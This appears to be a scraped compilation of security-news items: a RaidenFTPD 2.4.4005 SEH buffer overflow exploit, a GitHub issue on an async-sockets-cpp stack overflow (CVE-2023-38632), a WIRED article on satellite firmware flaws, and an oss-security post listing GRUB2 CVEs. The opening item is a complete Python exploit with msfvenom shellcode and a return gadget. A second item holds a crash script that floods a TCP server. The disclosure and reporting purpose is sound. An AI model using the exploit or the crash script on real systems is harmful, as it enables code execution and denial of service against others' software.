RaidenFTPD version 2.4.4005 suffers from a buffer overflow vulnerability.

    # Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)# Date: 18/07/2023# Exploit Author: Andre Nogueira# Vendor Homepage: https://www.raidenftpd.com/en/# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe# Version: RaidenFTPD 2.4.4005# Tested on: Microsoft Windows 10 Build 19045# 1.- Open RaidenFTPD# 2.- Click on 'Setup' -> 'Step by step setup wizard'# 3.- Run python code: exploit-raidenftpd.py# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'# 5.- Click 'next' -> 'next' -> 'ok'# 6.- Pop calc.exe#!/usr/bin/env python3from struct import packcrash = 2000offset = 497# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" shellcode =  b"\x90" * 8shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytesSEH = pack("<L", 0x7c1e76ff) #  pop eax; pop esi; ret; => msvcp70.dllbuffer = b"A" * offsetbuffer += nSEHbuffer += SEHbuffer += shellcodebuffer += b"D" * (crash -len(buffer))file_payload = open("exploit-raiden.txt", 'wb')print("[*] Creating the .txt file for out payload")file_payload.write(buffer)print("[*] Writing malicious payload to the .txt file")file_payload.close()

RaidenFTPD 2.4.4005 Buffer Overflow

async-sockets-cpp through 0.3.1 has a stack-based buffer overflow in tcpsocket.hpp when processing malformed TCP packets.

Hi!

It appears that async-sockets-cpp contains a remote buffer overflow vulnerability in static void Receive(TCPSocket\* socket) at tcpsocket.hpp, around lines 102-110. The buffer overflow affects all corresponding TCP servers. The remote buffer overflow can be triggered by connecting to a socket and sending a large buffer of bytes.

while ((messageLength = recv(socket->sock, tempBuffer, BUFFER\_SIZE, 0)) > 0)

{

tempBuffer\[messageLength\] = '\\0';

if(socket->onMessageReceived)

socket->onMessageReceived(std::string(tempBuffer, messageLength));

if(socket->onRawMessageReceived)

socket->onRawMessageReceived(tempBuffer, messageLength);

}

To confirm the issue, I first compiled the example tcp server from the async-sockets-cpp/examples folder with debug symbols and address sanitizer:

**Makefile**

    CC		:= g++
    CFLAGS	:= --std=c++11 -Wall -Wextra -Werror=conversion -fsanitize=address -g
    LIBS	:= -lpthread -fsanitize=address
    INC		:= ../async-sockets/include
    RM		:= rm
    
    .PHONY: all clean
    
    all: tcp-client tcp-server udp-client udp-server
    
    tcp-client: tcp-client.cpp $(INC)/tcpsocket.hpp
    	$(CC) $(CFLAGS) $< -I$(INC) $(LIBS) -o $@
    
    tcp-server: tcp-server.cpp $(INC)/tcpserver.hpp
    	$(CC) $(CFLAGS) $< -I$(INC) $(LIBS) -o $@
    
    udp-client: udp-client.cpp $(INC)/udpsocket.hpp
    	$(CC) $(CFLAGS) $< -I$(INC) $(LIBS) -o $@
    
    udp-server: udp-server.cpp $(INC)/udpserver.hpp
    	$(CC) $(CFLAGS) $< -I$(INC) $(LIBS) -o $@
    
    clean:
    	$(RM) tcp-client
    	$(RM) tcp-server
    	$(RM) udp-client
    	$(RM) udp-server
    

**Compilation**

Once the server was compiled, I executed the tcp-server on port 8888:

I then created a python3 script that will connect to the tcp-server and send a large packet with around 4096 (or larger) bytes of content:

    import socket
    
    host = "localhost"
    port = 8888                   # The same port as used by the server
    buf = b'A'*10000               # Overflow happens at 4095 bytes
    
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
    except:
        print("Completed...")
    

Executing the above python3 script will result in the server crashing and producing the following detailed output from address sanitizer showing the location of the stack buffer overflow:

**ASAN Output**

    =================================================================
    ==1124507==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffff4ffdcb0 at pc 0x55555555ef97 bp 0x7ffff4ffcc00 sp 0x7ffff4ffcbf8
    WRITE of size 1 at 0x7ffff4ffdcb0 thread T2
        #0 0x55555555ef96 in TCPSocket<(unsigned short)4096>::Receive(TCPSocket<(unsigned short)4096>*) ../async-sockets/include/tcpsocket.hpp:104
        #1 0x555555560775 in void std::__invoke_impl<void, void (*)(TCPSocket<(unsigned short)4096>*), TCPSocket<(unsigned short)4096>*>(std::__invoke_other, void (*&&)(TCPSocket<(unsigned short)4096>*), TCPSocket<(unsigned short)4096>*&&) /usr/include/c++/12/bits/invoke.h:61
        #2 0x5555555605eb in std::__invoke_result<void (*)(TCPSocket<(unsigned short)4096>*), TCPSocket<(unsigned short)4096>*>::type std::__invoke<void (*)(TCPSocket<(unsigned short)4096>*), TCPSocket<(unsigned short)4096>*>(void (*&&)(TCPSocket<(unsigned short)4096>*), TCPSocket<(unsigned short)4096>*&&) /usr/include/c++/12/bits/invoke.h:96
        #3 0x5555555604f2 in void std::thread::_Invoker<std::tuple<void (*)(TCPSocket<(unsigned short)4096>*), TCPSocket<(unsigned short)4096>*> >::_M_invoke<0ul, 1ul>(std::_Index_tuple<0ul, 1ul>) /usr/include/c++/12/bits/std_thread.h:252
        #4 0x55555556048f in std::thread::_Invoker<std::tuple<void (*)(TCPSocket<(unsigned short)4096>*), TCPSocket<(unsigned short)4096>*> >::operator()() /usr/include/c++/12/bits/std_thread.h:259
        #5 0x555555560453 in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (*)(TCPSocket<(unsigned short)4096>*), TCPSocket<(unsigned short)4096>*> > >::_M_run() /usr/include/c++/12/bits/std_thread.h:210
        #6 0x7ffff74d44a2  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd44a2)
        #7 0x7ffff76a7fd3 in start_thread nptl/pthread_create.c:442
        #8 0x7ffff77285bb in clone3 ../sysdeps/unix/sysv/linux/x86_64/clone3.S:81
    
    Address 0x7ffff4ffdcb0 is located in stack of thread T2 at offset 4224 in frame
        #0 0x55555555eea1 in TCPSocket<(unsigned short)4096>::Receive(TCPSocket<(unsigned short)4096>*) ../async-sockets/include/tcpsocket.hpp:97
    
      This frame has 3 object(s):
        [48, 49) '<unknown>'
        [64, 96) '<unknown>'
        [128, 4224) 'tempBuffer' (line 99) <== Memory access at offset 4224 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    Thread T2 created by T1 here:
        #0 0x7ffff7849726 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:207
        #1 0x7ffff74d4578 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd4578)
        #2 0x55555555e36c in TCPSocket<(unsigned short)4096>::Listen() ../async-sockets/include/tcpsocket.hpp:87
        #3 0x55555555cf36 in TCPServer<(unsigned short)4096>::Accept(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>) ../async-sockets/include/tcpserver.hpp:84
        #4 0x555555560909 in void std::__invoke_impl<void, void (*)(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>), TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)> >(std::__invoke_other, void (*&&)(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>), TCPServer<(unsigned short)4096>*&&, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>&&) /usr/include/c++/12/bits/invoke.h:61
        #5 0x5555555606b5 in std::__invoke_result<void (*)(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>), TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)> >::type std::__invoke<void (*)(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>), TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)> >(void (*&&)(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>), TCPServer<(unsigned short)4096>*&&, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>&&) /usr/include/c++/12/bits/invoke.h:96
        #6 0x555555560558 in void std::thread::_Invoker<std::tuple<void (*)(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>), TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)> > >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/12/bits/std_thread.h:252
        #7 0x5555555604ab in std::thread::_Invoker<std::tuple<void (*)(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>), TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)> > >::operator()() /usr/include/c++/12/bits/std_thread.h:259
        #8 0x555555560473 in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (*)(TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>), TCPServer<(unsigned short)4096>*, std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)> > > >::_M_run() /usr/include/c++/12/bits/std_thread.h:210
        #9 0x7ffff74d44a2  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd44a2)
    
    Thread T1 created by T0 here:
        #0 0x7ffff7849726 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:207
        #1 0x7ffff74d4578 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd4578)
        #2 0x55555555beb3 in TCPServer<(unsigned short)4096>::Listen(std::function<void (int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >)>) ../async-sockets/include/tcpserver.hpp:56
        #3 0x55555555814d in main /home/kali/projects/fuzzing/async-sockets-cpp/examples/tcp-server.cpp:42
        #4 0x7ffff7646189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: stack-buffer-overflow ../async-sockets/include/tcpsocket.hpp:104 in TCPSocket<(unsigned short)4096>::Receive(TCPSocket<(unsigned short)4096>*)
    Shadow bytes around the buggy address:
      0x10007e9f7b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007e9f7b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007e9f7b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007e9f7b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007e9f7b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10007e9f7b90: 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x10007e9f7ba0: f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
      0x10007e9f7bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007e9f7bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007e9f7bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007e9f7be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==1124507==ABORTING
    
    

A possible fix could be to check the size of messageLength before copying data to the buffer.

Thanks!

CVE-2023-38632: Stack buffer overflow in static void Receive(TCPSocket* socket) at tcpsocket.hpp · Issue #31 · eminfedar/async-sockets-cpp

The PKCS#11 feature in ssh-agent in OpenSSH versions prior to 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system.

OpenSSH Forwarded SSH-Agent Remote Code Execution

German researchers gained rare access to three satellites and found that they're years behind normal cybersecurity standards.

Hundreds of miles above Earth, thousands of satellites are orbiting the planet to keep the world running smoothly. Timing systems, GPS, and communications technologies are all powered by satellites. But for years, security researchers have warned that more needs to be done to secure the satellites against cyberattacks.

A new analysis from a group of German academics provides a rare glimpse into some of the security weaknesses in satellites currently circling the Earth. The researchers, from the Ruhr University Bochum and the Cispa Helmholtz Center for Information Security, have examined the software used by three small satellites and found that the systems lack some basic protections.

The satellites inspected by the researchers, according to an academic paper, contain “simple” vulnerabilities in their firmware and show “that little security research from the last decade has reached the space domain.” Among the problems are a lack of protection for who can communicate with the satellite systems and a failure to include encryption. Theoretically, the researchers say, the kinds of issues they discovered could allow an attacker to take control of a satellite and crash it into other objects.

There are multiple kinds of satellites in use today, ranging in size and purpose. Satellites created by commercial companies can be found photographing the Earth and providing navigation data. Military satellites are cloaked in secrecy and often used for spying. There are also research satellites, which are run by space agencies and universities.

Johannes Willbold, a PhD student at Ruhr University Bochum and the lead researcher behind the security analysis, says the current state of satellite security can be classed as “security by obscurity.” In other words: Little is known about how well they are protected. Willbold says the research team approached multiple organizations with satellites in space to ask if they could inspect their firmware, and the vast majority refused or didn’t reply—he praises the openness of the three that worked with his team.

The three satellites the team focused on are used for research, fly in low Earth orbit, and are largely operated by universities. The reserachers inspected the firmware of ESTCube-1, an Estonian cube satellite that launched in 2013; the European Space Agency’s OPS-SAT, which is an open research platform; and the Flying Laptop, a mini satellite created by Stuttgart University and defense firm Airbus.

The researchers’ analysis says they found six kinds of security vulnerabilities across all three satellites and 13 vulnerabilities in total. Among these vulnerabilities were “unprotected telecommand interfaces,” which satellite operators on the ground use to communicate with the vehicles when they are in orbit. “Oftentimes, they lack access protection in the first place,” says Willbold, who is also presenting the research at the Black Hat security conference in Las Vegas next month. “They’re essentially not checking anything.”

As well as the vulnerabilities within the satellites’ software, Willbold says, the team found an issue in a code library that appears to be used by multiple satellites. The research details a stack-based buffer overflow vulnerability in software developed by nanosatellite manufacturer GomSpace. The source of the problem, the research says, is within a library that was last updated in 2014. Willbold says GomSpace acknowledged the findings when the researchers reported the issue. GomSpace did not respond to WIRED’s request for comment.

The creators of the satellites examined by the researchers told WIRED that providing their firmware to the researchers was beneficial and that they will take the findings on board for future spacecraft. Simon Plum, head of the Mission Operations Department at the European Space Agency (ESA), says a different level of security is applied to OPS-SAT than to other missions, as it is a “space laboratory.” However, Plum says ESA is reviewing the findings and has made at least one change to the satellite already. “We want to protect space systems from cyber threats and develop culture and common knowledge of resilience in the field of space cybersecurity,” Plum says.

Andris Slavinskis, an associate professor at the University of Tartu in Estonia who works on the ESTCube project, says the findings are “important and relevant” and that the ESTCube-1 system was “developed and launched during the Wild West times of the cubesat world.” A second version of the satellite, ESTCube-2, is set to launch this year. Meanwhile, Sabine Klinkner, a professor of satellite technology at Stuttgart University, which partly developed the Flying Laptop, says the “weaknesses” the researchers found are a result of trade-offs around functionality and access to the satellite.

“As with many university satellites, our threat model weighted the small incentives to attack an academic satellite against the still not completely trivial challenges in establishing a link and sending valid commands to the satellite,” Klinkner says. No malicious connections to the satellite have been spotted, Klinkner adds. And she says future missions will have increased cybersecurity measures to protect against threats.

Despite the satellite security analysis mostly focusing on research and academic satellites, it highlights wider security issues around satellites that experts have been concerned about for years. Gregory Falco, an assistant professor at Johns Hopkins University who focuses on space cybersecurity, says it is rare for researchers to be able to get their hands on satellite firmware and publish research on it. There’s “almost nothing” publicly available that’s similar to the type of analysis the German team completed, Falco says.

The warnings about space systems aren’t new. Researchers have long said more needs to be done to protect space systems from attack and to improve how they are created. Falco says that space firmware and software development is a “nightmare” for two reasons. First, legacy software is often used in development and is rarely updated, Flaco says. “The other reason why is because space systems are not built by software developers. They are built by aerospace engineers, for the most part.” The German researchers also surveyed 19 satellite industry professionals about the levels of security in their systems. “We focused on providing a functioning system instead of a secure one,” one of those surveyed said, according to the academic paper.

Juliana Suess, a research analyst and policy lead on space security at the defense think tank Royal United Services Institute, explains that there are multiple ways satellite systems can be attacked, beyond software and firmware vulnerabilities. These include jamming and spoofing attacks, which interfere with the signals being transmitted to and from satellites. “You don't need to be a space power to do it,” Suess says. Last year, security researchers with permission demonstrated how a decommissioned satellite could be used to broadcast rogue TV signals. And in October 2007 and July 2008, Chinese hackers were blamed for disrupting two US satellites.

Suess believes the cyberattack against the Viasat satellite system at the start of Russia’s full-scale invasion of Ukraine last year has acted as a further wake-up call to the space industry. In the early hours of February 24, 2022, when Russian troops first moved into Ukrainian land, a cyberattack interrupted thousands of modems from the satellite internet system. The attack knocked connections offline around the world, including German wind farms. The EU, UK, and US have linked the attack to Russia, and it has prompted the US National Security Agency to speak out about satellite security.

As experts continue to sound the alarm around space cybersecurity issues, the commercial space sector is going through a boom. SpaceX and other companies are racing to put thousands of satellites into orbit to provide internet connections, and it has become cheaper for satellites to photograph Earth from space. Alongside big firms, there’s a smaller array of companies building components and parts to be included in spacecraft. This supply chain poses extra security risks.

“They absolutely are not prioritizing security,” Falco says. “They probably don’t have any people who know anything about it on their staff.” In June of this year, the Institute of Electrical and Electronics Engineers Standards Association announced a new effort, which Falco is chairing, to introduce common practices and requirements for cybersecurity across the space industry. “There’s so much money that’s going into developing commercially led space systems, commercial entities need to have some guidance,” Falco says.

Satellites Are Rife With Basic Security Flaws

Integer underflow in grub_net_recv_ip4_packets; A malicious crafted IP packet can lead to an integer underflow in grub_net_recv_ip4_packets() function on rsm->total_len value. Under certain circumstances the total_len value may end up wrapping around to a small integer number which will be used in memory allocation. If the attack succeeds in such way, subsequent operations can write past the end of the buffer.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 7 Jun 2022 19:04:13 +0000
From: John Haxby <john.haxby@...cle.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
CC: Daniel Kiper <daniel.kiper@...cle.com>
Subject: \[SECURITY PATCH 00/30\]  Multiple GRUB2 vulnerabilities - 2022/06/07
 round

\[ This message was sent to grub-devel@....org.   It's archived at.    \]
\[ https://lists.gnu.org/archive/html/grub-devel/2022-06/msg00035.html \]
\[ and the 30 individual patches are linked from there as well as in.  \]
\[ the git repo. These issues were previously brought to the.          \]
\[ linux-distros list.                                                 \]


Hi all,

This patch set contains a bundle of fixes for various security flaws discovered
in the GRUB2 during last year. The most severe ones, i.e. potentially exploitable,
have CVEs assigned and are listed at the end of this email. Additionally, the list
of CVEs contains a CVE assigned for the shim vulnerability. It has been added
for completeness.

Details of exactly what needs updating will be provided by the respective
distros and vendors when updates become available. Here \[1\] we are listing at
least some links to the messaging known at the time of this posting.

Full mitigation against all CVEs will require updated shim with latest SBAT
(Secure Boot Advanced Targeting) \[2\] data provided by distros and vendors.
This time UEFI revocation list (dbx) will not be used and revocation of broken
artifacts will be done with SBAT only. For information on how to apply the
latest SBAT revocations, please see mokutil(1). Vendor shims may explicitly
permit known older boot artifacts to boot.

Updated GRUB2, shim and other boot artifacts from all the affected vendors will
be made available when the embargo lifts or some time thereafter.

I am posting all the GRUB2 upstream patches which fix all security bugs found
and reported up until now. Major Linux distros carry or will carry soon one
form or another of these patches. Now all the GRUB2 upstream patches are in
the GRUB2 git repository \[3\] too.

I would like to thank, in alphabetical order, the following people who were working
really hard on the GRUB, shim and other things related to these issues:
 - Alec Brown (Oracle),
 - Alexander Burmashev (Oracle),
 - Andrew Cooper (Citrix),
 - Chris Coulson (Canonical),
 - D. Jared Dominguez (Red Hat),
 - Daniel Axtens,
 - Darren Kenny (Oracle),
 - Eric Snowberg (Oracle),
 - Ilya Okomin (Oracle),
 - Jagannathan Raman (Oracle),
 - Jan Setje-Eilers (Oracle),
 - Jeremiah Cox,
 - John Haxby (Oracle),
 - Julian Andres Klode (Canonical),
 - Lidong Chen (Oracle),
 - Marco A Benatto (Red Hat),
 - Marcus Meissner (SUSE),
 - Marta Lewandowska (Red Hat),
 - Michael Chang (SUSE),
 - Peter Jones (Red Hat),
 - Petr Janda (Red Hat),
 - Robbie Harwood (Red Hat),
 - Robert Truxal (Microsoft),
 - Ross Philipson (Oracle),
 - Steve McIntyre (Debian),
 - Sudhakar Kuppusamy (IBM),
 - Tamas K Lengyel (Intel),
 - Todd Cullum (Red Hat),
 - Vikram Narayanan (University of California Irvine).

We would not be able to succeed without all your hard work.

It was very big pleasure to work with you all.

Thank you!

Daniel

\[1\] Red Hat: https://access.redhat.com/security/security-updates/#/
   SUSE:    https://www.suse.com/support/kb/doc/?id=000020668

\[2\] https://github.com/rhboot/shim/blob/main/SBAT.md

\[3\] https://git.savannah.gnu.org/gitweb/?p=grub.git
   https://git.savannah.gnu.org/git/grub.git

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3695 grub2: Crafted PNG grayscale images may lead to out-of-bounds write in heap
7.5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

A crafted 16-bit grayscale PNG image may lead to a out-of-bounds write in the
heap area. An attacker may take advantage of that to cause heap data corruption
or eventually arbitrary code execution and circumvent secure boot protections.
This issue has a high complexity to be exploited as an attacker needs to
perform some triage over the heap layout to achieve significant results, also
the values written into the memory are repeated three times in a row making
difficult to produce valid payloads.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3696 grub2: Crafted PNG image may lead to out-of-bound write during huffman table handling
5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L

A heap out-of-bounds write may happen during the handling of Huffman tables in
the PNG reader. This may lead to data corruption in the heap space.
Confidentiality, Integrity and Availability impact may be considered Low as it's
very complex to an attacker control the encoding and positioning of corrupted
Huffman entries to achieve results such as arbitrary code execution and/or
secure boot circumvention.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3697 grub2: Crafted JPEG image can lead to buffer underflow write in the heap
7.5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

A crafted JPEG image may lead the JPEG reader to underflow its data pointer,
allowing user controlled data to be written in heap. To be successfully
performed the attacker needs to do some triage over the heap layout and craft
an image with a malicious format and payload. This vulnerability can lead to
data corruption and eventual code execution or secure boot circumvention.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28733 grub2: Integer underflow in grub\_net\_recv\_ip4\_packets
8.1/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

A malicious crafted IP packet can lead to an integer underflow in
grub\_net\_recv\_ip4\_packets() function on rsm->total\_len value. Under certain
circumstances the total\_len value may end up wrapping around to a small integer
number which will be used in memory allocation. If the attack succeeds in such
way, subsequent operations can write past the end of the buffer.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28734 grub2: Out-of-bounds write when handling split HTTP headers
7/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

When handling split HTTP headers, GRUB2 HTTP code accidentally moves its
internal data buffer point by one position. This can lead to a out-of-bound
write further when parsing the HTTP request, writing a NULL byte past the
buffer. It's conceivable that an attacker controlled set of packets can lead
to corruption of the GRUB2's internal memory metadata.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28735 grub2: shim\_lock verifier allows non-kernel files to be loaded
6.7/CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

The GRUB2's shim\_lock verifier allows non-kernel files to be loaded on shim-powered
secure boot systems. Allowing such files to be loaded may lead to unverified
code and modules to be loaded in GRUB2 breaking the secure boot trust-chain.

Reported-by: Julian Andres Klode

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28736 grub2: use-after-free in grub\_cmd\_chainloader()
6.4/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

There's a use-after-free vulnerability in grub\_cmd\_chainloader() function. The
chainloader command is used to boot up operating systems that doesn't support
multiboot and do not have direct support from GRUB2. When executing chainloader
more than once a use-after-free vulnerability is triggered. If an attacker can
control the GRUB2's memory allocation pattern sensitive data may be exposed and
arbitrary code execution can be achieved.

Reported-by: Chris Coulson

